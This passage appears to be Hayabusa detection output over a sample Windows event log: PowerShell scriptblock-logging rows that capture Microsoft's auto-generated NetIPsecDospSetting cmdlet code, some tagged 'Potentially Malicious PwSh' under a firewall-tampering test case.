$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias 